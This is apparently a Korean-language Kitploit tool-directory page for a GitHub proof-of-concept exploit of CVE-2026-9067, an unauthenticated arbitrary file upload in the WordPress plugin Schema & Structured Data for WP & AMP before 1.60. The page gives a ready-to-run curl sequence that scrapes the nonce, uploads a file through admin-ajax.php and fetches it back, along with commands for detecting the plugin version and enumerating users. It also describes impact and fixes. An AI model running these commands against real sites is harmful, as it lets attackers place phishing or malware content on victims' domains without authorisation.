Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
By-Poloss..-..CVE-2026-9067 — Schema & Structured Data for WP & AMP < 1.60 - 인증되지 않은 임의 미디어 업로드 [POC & Xploit] | Kitploit
도구/GitHubGitHub/polosss/by-poloss..-..cve-2026-9067
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubpolosss/by-poloss..-..cve-2026-9067

By-Poloss..-..CVE-2026-9067

Schema & Structured Data for WP & AMP < 1.60 - 인증되지 않은 임의 미디어 업로드 [POC & Xploit]

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
32개월 전아직 검토되지 않음

POC & Xploit - 개념 증명 디렉토리

WordPress 보안 테스트 환경에서 발견된 취약점에 대한 문서 및 익스플로잇


취약점 목록

CVE ID플러그인심각도유형상태
CVE-2026-9067Schema & Structured Data for WP & AMP높음 (8.1)무제한 파일 업로드문서화됨

CVE-2026-9067

빠른 요약

취약점 설명

Schema & Structured Data for WP & AMP 플러그인 버전 1.60 미만은 파일 업로드를 위한 AJAX 핸들러에서 사용자 권한을 검증하지 않고 업로드된 파일 형식을 검증하지 않습니다. 이로 인해 인증되지 않은 공격자가 임의 파일을 업로드할 수 있습니다.

영향

  • 콘텐츠 호스팅: 공격자가 피해자 도메인에 악성 콘텐츠를 호스팅할 수 있음
  • 디스크 소비: 임의 파일 업로드로 디스크 공간을 소진할 수 있음
  • 평판 악용: 피해자 도메인에서의 맬웨어, 피싱 페이지 배포

중요 참고사항: WordPress 코어는 실행 파일(.php, .phtml, .html, .svg)을 차단하므로, 이 취약점으로 인한 직접적인 RCE 경로는 없습니다.

Files

root@kitploit:~
CVE-2026-9067/
├── CVE-2026-9067.md       # Dokumentasi lengkap (file ini)
├── CVE-2026-9067.py       # Python exploit dengan multi-threading
├── CVE-2026-9067.sh       # Bash/Shell PoC script
└── CVE-2026-9067_exploit.sh  # Alternative Bash PoC

빠른 PoC

root@kitploit:~
# Step 1: Get nonce
NONCE=$(curl -s "https://yorbit7.ddev.site/" | grep -oP 'saswp_rf_(page_)?security_nonce["\x27]?\s*:\s*["\'](https://github.com/polosss/by-poloss..-..cve-2026-9067/blob/HEAD/%5Ba-f0-9%5D%7B10%7D)["\']' | grep -oP '[a-f0-9]{10}' | head -1)

# Step 2: Upload arbitrary file
curl -X POST 'https://yorbit7.ddev.site/wp-admin/admin-ajax.php' \
  -F 'action=saswp_rf_form_image_upload' \
  -F "saswp_rf_form_nonce=$NONCE" \
  -F '[email protected];type=image/png;filename=evil.csv'

# Step 3: Access uploaded file
curl -s "https://yorbit7.ddev.site/wp-content/uploads/$(date +%Y)/$(date +%m)/evil.csv"

환경 정보


테스트 명령어

사이트 상태 확인

root@kitploit:~
curl -s -o /dev/null -w "%{http_code}" https://yorbit7.ddev.site

플러그인 버전 확인

root@kitploit:~
curl -s https://yorbit7.ddev.site/wp-content/plugins/schema-and-structured-data-for-wp/readme.txt | grep -i "Stable tag:"

사용자 열거

root@kitploit:~
curl -s https://yorbit7.ddev.site/wp-json/wp/v2/users | jq '.[] | {id, name, slug}'

해결 방법

  1. 플러그인 업그레이드: Schema & Structured Data for WP & AMP를 버전 1.60 이상으로 업데이트
  2. 플러그인 비활성화: 업그레이드가 불가능하면 플러그인 비활성화
  3. 강화:
    • DISALLOW_FILE_MODIFICATIONS 상수 설정
    • .htaccess를 통해 업로드 디렉토리에서 PHP 실행 비활성화
    • WAF 규칙 구현

참고 자료

  • NVD CVE-2026-9067
  • WPScan Vulnerability Database
  • WordPress 플러그인 페이지
  • 원본 연구자: 0xBassia
도구 다운로드
필드값
CVE IDCVE-2026-9067
플러그인Schema & Structured Data for WP & AMP
영향받는 버전< 1.60
CWECWE-434 (위험한 유형의 파일 무제한 업로드)
CVSS v3.18.1 (높음)
발견자0xBassia
필드값
대상 URLhttps://yorbit7.ddev.site
PHP 버전8.4
데이터베이스MariaDB 11.8
WordPress 버전7.0
테스트 방법curl 기반 (블랙박스 테스트)